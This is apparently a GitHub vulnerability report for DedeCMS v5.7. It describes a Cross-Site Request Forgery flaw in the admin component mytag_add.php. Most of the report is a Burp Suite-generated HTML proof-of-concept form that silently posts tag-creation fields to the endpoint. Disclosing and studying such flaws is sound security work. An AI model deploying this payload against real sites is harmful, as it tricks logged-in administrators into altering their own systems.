target:https://github.com/wdsunwq/DedeCMSv5 version: v5.7

DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/mytag_add.php

Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/src/dede/mytag_add.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="dopost" value="save" />
      <input type="hidden" name="token" value="825dfb63dc9afa15286cd7d0632f9b0c" />
      <input type="hidden" name="typeid" value="0" />
      <input type="hidden" name="tagname" value="cssc" />
      <input type="hidden" name="timeset" value="0" />
      <input type="hidden" name="starttime" value="2024&#45;03&#45;26&#32;16&#58;11&#58;46" />
      <input type="hidden" name="endtime" value="2024&#45;04&#45;25&#32;16&#58;11&#58;46" />
      <input type="hidden" name="normbody" value="" />
      <input type="hidden" name="expbody" value="" />
      <input type="hidden" name="imageField&#46;x" value="36" />
      <input type="hidden" name="imageField&#46;y" value="9" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

successed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

19.md

19.md

Files

19.md

Latest commit

History

19.md

File metadata and controls